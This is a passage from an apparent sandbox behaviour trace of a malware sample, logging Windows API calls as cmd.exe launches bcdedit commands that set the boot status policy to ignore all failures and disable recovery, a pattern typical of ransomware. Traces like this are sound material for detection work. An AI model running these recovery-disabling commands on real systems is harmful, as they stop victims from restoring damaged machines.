_String2="COLOR") returned -1 [0114.020] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0114.020] _wcsicmp (_String1="bcdedit", _String2="DIR") returned -2 [0114.021] _wcsicmp (_String1="bcdedit", _String2="ERASE") returned -3 [0114.021] _wcsicmp (_String1="bcdedit", _String2="DEL") returned -2 [0114.021] _wcsicmp (_String1="bcdedit", _String2="TYPE") returned -18 [0114.021] _wcsicmp (_String1="bcdedit", _String2="COPY") returned -1 [0114.021] _wcsicmp (_String1="bcdedit", _String2="CD") returned -1 [0114.021] _wcsicmp (_String1="bcdedit", _String2="CHDIR") returned -1 [0114.021] _wcsicmp (_String1="bcdedit", _String2="RENAME") returned -16 [0114.021] _wcsicmp (_String1="bcdedit", _String2="REN") returned -16 [0114.021] _wcsicmp (_String1="bcdedit", _String2="ECHO") returned -3 [0114.021] _wcsicmp (_String1="bcdedit", _String2="SET") returned -17 [0114.021] _wcsicmp (_String1="bcdedit", _String2="PAUSE") returned 
-14 [0114.021] _wcsicmp (_String1="bcdedit", _String2="DATE") returned -2 [0114.021] _wcsicmp (_String1="bcdedit", _String2="TIME") returned -18 [0114.021] _wcsicmp (_String1="bcdedit", _String2="PROMPT") returned -14 [0114.022] _wcsicmp (_String1="bcdedit", _String2="MD") returned -11 [0114.022] _wcsicmp (_String1="bcdedit", _String2="MKDIR") returned -11 [0114.022] _wcsicmp (_String1="bcdedit", _String2="RD") returned -16 [0114.022] _wcsicmp (_String1="bcdedit", _String2="RMDIR") returned -16 [0114.022] _wcsicmp (_String1="bcdedit", _String2="PATH") returned -14 [0114.022] _wcsicmp (_String1="bcdedit", _String2="GOTO") returned -5 [0114.022] _wcsicmp (_String1="bcdedit", _String2="SHIFT") returned -17 [0114.022] _wcsicmp (_String1="bcdedit", _String2="CLS") returned -1 [0114.022] _wcsicmp (_String1="bcdedit", _String2="CALL") returned -1 [0114.022] _wcsicmp (_String1="bcdedit", _String2="VERIFY") returned -20 [0114.022] _wcsicmp (_String1="bcdedit", _String2="VER") returned -20 [0114.022] _wcsicmp (_String1="bcdedit", _String2="VOL") returned -20 [0114.022] _wcsicmp (_String1="bcdedit", _String2="EXIT") returned -3 [0114.022] _wcsicmp (_String1="bcdedit", _String2="SETLOCAL") returned -17 [0114.022] _wcsicmp (_String1="bcdedit", _String2="ENDLOCAL") returned -3 [0114.023] _wcsicmp (_String1="bcdedit", _String2="TITLE") returned -18 [0114.023] _wcsicmp (_String1="bcdedit", _String2="START") returned -17 [0114.023] _wcsicmp (_String1="bcdedit", _String2="DPATH") returned -2 [0114.023] _wcsicmp (_String1="bcdedit", _String2="KEYS") returned -9 [0114.023] _wcsicmp (_String1="bcdedit", _String2="MOVE") returned -11 [0114.023] _wcsicmp (_String1="bcdedit", _String2="PUSHD") returned -14 [0114.023] _wcsicmp (_String1="bcdedit", _String2="POPD") returned -14 [0114.023] _wcsicmp (_String1="bcdedit", _String2="ASSOC") returned 1 [0114.023] _wcsicmp (_String1="bcdedit", _String2="FTYPE") returned -4 [0114.023] _wcsicmp (_String1="bcdedit", _String2="BREAK") returned -15 
[0114.023] _wcsicmp (_String1="bcdedit", _String2="COLOR") returned -1 [0114.023] _wcsicmp (_String1="bcdedit", _String2="MKLINK") returned -11 [0114.023] _wcsicmp (_String1="bcdedit", _String2="FOR") returned -4 [0114.024] _wcsicmp (_String1="bcdedit", _String2="IF") returned -7 [0114.024] _wcsicmp (_String1="bcdedit", _String2="REM") returned -16 [0114.025] GetProcessHeap () returned 0x4e0000 [0114.025] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x218) returned 0x4f9ab0 [0114.025] GetProcessHeap () returned 0x4e0000 [0114.025] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x86) returned 0x4f9cd0 [0114.025] _wcsnicmp (_String1="bcde", _String2="cmd ", _MaxCount=0x4) returned -1 [0114.026] GetProcessHeap () returned 0x4e0000 [0114.026] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x420) returned 0x4e1320 [0114.026] SetErrorMode (uMode=0x0) returned 0x0 [0114.026] SetErrorMode (uMode=0x1) returned 0x0 [0114.027] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4e1330, lpFilePart=0x2ef160 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef160*="Desktop") returned 0x25 [0114.027] SetErrorMode (uMode=0x0) returned 0x1 [0114.027] GetProcessHeap () returned 0x4e0000 [0114.027] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4e1320, Size=0x6c) returned 0x4e1320 [0114.027] GetProcessHeap () returned 0x4e0000 [0114.027] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4e1320) returned 0x6c [0114.027] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.027] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.028] GetProcessHeap () returned 0x4e0000 [0114.028] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x128) returned 0x4f9d60 [0114.028] GetProcessHeap () returned 0x4e0000 [0114.028] 
RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x240) returned 0x4e13a0 [0114.191] GetProcessHeap () returned 0x4e0000 [0114.191] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4e13a0, Size=0x12a) returned 0x4e13a0 [0114.192] GetProcessHeap () returned 0x4e0000 [0114.192] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4e13a0) returned 0x12a [0114.192] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.192] GetProcessHeap () returned 0x4e0000 [0114.192] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xe8) returned 0x4f9e90 [0114.192] GetProcessHeap () returned 0x4e0000 [0114.192] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4f9e90, Size=0x7e) returned 0x4f9e90 [0114.192] GetProcessHeap () returned 0x4e0000 [0114.192] RtlSizeHeap (HeapHandle=0x4e0000, Flags=0x0, MemoryPointer=0x4f9e90) returned 0x7e [0114.335] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.336] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x2eeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeed0) returned 0xffffffffffffffff [0114.336] GetLastError () returned 0x2 [0114.336] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x2eeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeed0) returned 0xffffffffffffffff [0114.336] GetLastError () returned 0x2 [0114.336] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x2eeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeed0) returned 0x4f9f20 [0114.336] GetProcessHeap () returned 0x4e0000 [0114.336] RtlAllocateHeap 
(HeapHandle=0x4e0000, Flags=0x0, Size=0x28) returned 0x4f46c0 [0114.336] FindClose (in: hFindFile=0x4f9f20 | out: hFindFile=0x4f9f20) returned 1 [0114.336] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.COM", fInfoLevelId=0x1, lpFindFileData=0x2eeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeed0) returned 0xffffffffffffffff [0114.337] GetLastError () returned 0x2 [0114.337] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.EXE", fInfoLevelId=0x1, lpFindFileData=0x2eeed0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeed0) returned 0x4f9f20 [0114.337] GetProcessHeap () returned 0x4e0000 [0114.337] RtlReAllocateHeap (Heap=0x4e0000, Flags=0x0, Ptr=0x4f46c0, Size=0x8) returned 0x4f8a00 [0114.337] FindClose (in: hFindFile=0x4f9f20 | out: hFindFile=0x4f9f20) returned 1 [0114.337] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.337] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.337] GetConsoleTitleW (in: lpConsoleTitle=0x2ef420, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.337] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef1d8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef198 | out: lpAttributeList=0x2ef1d8, lpSize=0x2ef198) returned 1 [0114.337] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef1d8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef188, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef1d8, lpPreviousValue=0x0) returned 1 [0114.338] GetStartupInfoW (in: lpStartupInfo=0x2ef2f0 | out: lpStartupInfo=0x2ef2f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0114.338] 
GetProcessHeap () returned 0x4e0000 [0114.338] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x20) returned 0x4f46c0 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.338] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 
[0114.339] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.339] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0114.339] GetProcessHeap () returned 0x4e0000 [0114.339] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f46c0 | out: hHeap=0x4e0000) returned 1 [0114.340] GetProcessHeap () returned 0x4e0000 [0114.340] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0x12) returned 0x4f9f20 [0114.340] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0114.341] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", 
lpCommandLine="bcdedit /set {current} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ef210*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {current} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef1c0 | out: lpCommandLine="bcdedit /set {current} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x2ef1c0*(hProcess=0x54, hThread=0x50, dwProcessId=0x540, dwThreadId=0x2a8)) returned 1 [0115.300] CloseHandle (hObject=0x50) returned 1 [0115.301] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0115.301] GetProcessHeap () returned 0x4e0000 [0115.301] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fc330 | out: hHeap=0x4e0000) returned 1 [0115.301] GetEnvironmentStringsW () returned 0x4fad30* [0115.301] GetProcessHeap () returned 0x4e0000 [0115.301] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xae8) returned 0x4fb820 [0115.301] FreeEnvironmentStringsW (penv=0x4fad30) returned 1 [0115.301] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0116.789] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2ef108 | out: lpExitCode=0x2ef108*=0x0) returned 1 [0116.789] CloseHandle (hObject=0x54) returned 1 [0116.789] _vsnwprintf (in: _Buffer=0x2ef378, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef118 | out: _Buffer="00000000") returned 8 [0116.790] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0116.790] GetProcessHeap () returned 0x4e0000 [0116.790] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fb820 | out: hHeap=0x4e0000) returned 1 
[0116.790] GetEnvironmentStringsW () returned 0x4fad30* [0116.790] GetProcessHeap () returned 0x4e0000 [0116.790] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xb0e) returned 0x4fce30 [0116.793] FreeEnvironmentStringsW (penv=0x4fad30) returned 1 [0116.793] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0116.793] GetProcessHeap () returned 0x4e0000 [0116.793] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4fce30 | out: hHeap=0x4e0000) returned 1 [0116.793] GetEnvironmentStringsW () returned 0x4fad30* [0116.794] GetProcessHeap () returned 0x4e0000 [0116.794] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x8, Size=0xb0e) returned 0x4fce30 [0116.794] FreeEnvironmentStringsW (penv=0x4fad30) returned 1 [0116.794] GetProcessHeap () returned 0x4e0000 [0116.794] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x4f9f20 | out: hHeap=0x4e0000) returned 1 [0116.794] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef1d8 | out: lpAttributeList=0x2ef1d8) [0116.794] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.795] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0116.795] _get_osfhandle (_FileHandle=1) returned 0x7 [0116.795] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0116.796] _get_osfhandle (_FileHandle=0) returned 0x3 [0116.796] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0116.796] SetConsoleInputExeNameW () returned 0x1 [0116.796] GetConsoleOutputCP () returned 0x1b5 [0116.797] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0116.797] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0116.797] exit (_Code=0) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x48b46000" os_pid = "0x634" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x618" 
cmd_line = "\"C:\\Windows\\sysnative\\cmd.exe\" /c bcdedit /set {current} recoveryenabled no" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 11 os_tid = 0x48c [0113.898] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f770 | out: lpSystemTimeAsFileTime=0x14f770*(dwLowDateTime=0x2cd49c60, dwHighDateTime=0x1d5f7c9)) [0113.898] GetCurrentProcessId () returned 0x634 [0113.898] GetCurrentThreadId () returned 0x48c [0113.898] GetTickCount () returned 0x114a323 [0113.898] QueryPerformanceCounter (in: lpPerformanceCount=0x14f778 | out: lpPerformanceCount=0x14f778*=21992128155) returned 1 [0113.925] GetModuleHandleW (lpModuleName=0x0) returned 0x4abf0000 [0114.082] __set_app_type (_Type=0x1) [0114.082] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ac17810) returned 0x0 [0114.082] __getmainargs (in: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610, _DoWildCard=0, _StartInfo=0x4ac1e0f4 | out: _Argc=0x4ac3a608, _Argv=0x4ac3a618, _Env=0x4ac3a610) returned 0 [0114.082] GetCurrentThreadId () returned 0x48c [0114.083] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x48c) returned 0x3c [0114.083] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.083] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0114.083] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0114.083] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0114.083] RegOpenKeyExW 
(in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f708 | out: phkResult=0x14f708*=0x0) returned 0x2 [0114.084] VirtualQuery (in: lpAddress=0x14f6f0, lpBuffer=0x14f670, dwLength=0x30 | out: lpBuffer=0x14f670*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.084] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f670, dwLength=0x30 | out: lpBuffer=0x14f670*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.084] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f670, dwLength=0x30 | out: lpBuffer=0x14f670*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.084] VirtualQuery (in: lpAddress=0x54000, lpBuffer=0x14f670, dwLength=0x30 | out: lpBuffer=0x14f670*(BaseAddress=0x54000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0114.084] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f670, dwLength=0x30 | out: lpBuffer=0x14f670*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0114.084] GetConsoleOutputCP () returned 0x1b5 [0114.084] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0114.085] SetConsoleCtrlHandler (HandlerRoutine=0x4ac13184, Add=1) returned 1 [0114.085] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.085] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0114.085] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0114.085] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac1e194 | out: lpMode=0x4ac1e194) returned 1 [0114.086] _get_osfhandle (_FileHandle=1) returned 0x7 [0114.086] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0114.086] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.086] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac1e198 | out: lpMode=0x4ac1e198) returned 1 [0114.086] _get_osfhandle (_FileHandle=0) returned 0x3 [0114.086] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0114.087] GetEnvironmentStringsW () returned 0x2c8b40* [0114.087] GetProcessHeap () returned 0x2b0000 [0114.087] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xa7c) returned 0x2c95d0 [0114.087] FreeEnvironmentStringsW (penv=0x2c8b40) returned 1 [0114.088] GetProcessHeap () returned 0x2b0000 [0114.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2c89c0 [0114.088] GetEnvironmentStringsW () returned 0x2c8b40* [0114.088] GetProcessHeap () returned 0x2b0000 [0114.088] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xa7c) returned 0x2ca060 [0114.088] FreeEnvironmentStringsW (penv=0x2c8b40) returned 1 [0114.088] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e5c8 | out: phkResult=0x14e5c8*=0x44) returned 0x0 [0114.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x18, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.088] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x1, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, 
lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x1, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.088] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x0, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.088] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x40, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x40, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x40, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.089] RegCloseKey (hKey=0x44) returned 0x0 [0114.089] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e5c8 | out: phkResult=0x14e5c8*=0x44) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x0, lpData=0x14e5e0*=0x40, lpcbData=0x14e5c4*=0x1000) returned 0x2 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | out: lpType=0x14e5c0*=0x4, lpData=0x14e5e0*=0x1, lpcbData=0x14e5c4*=0x4) returned 0x0 [0114.089] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e5c0, lpData=0x14e5e0, lpcbData=0x14e5c4*=0x1000 | 
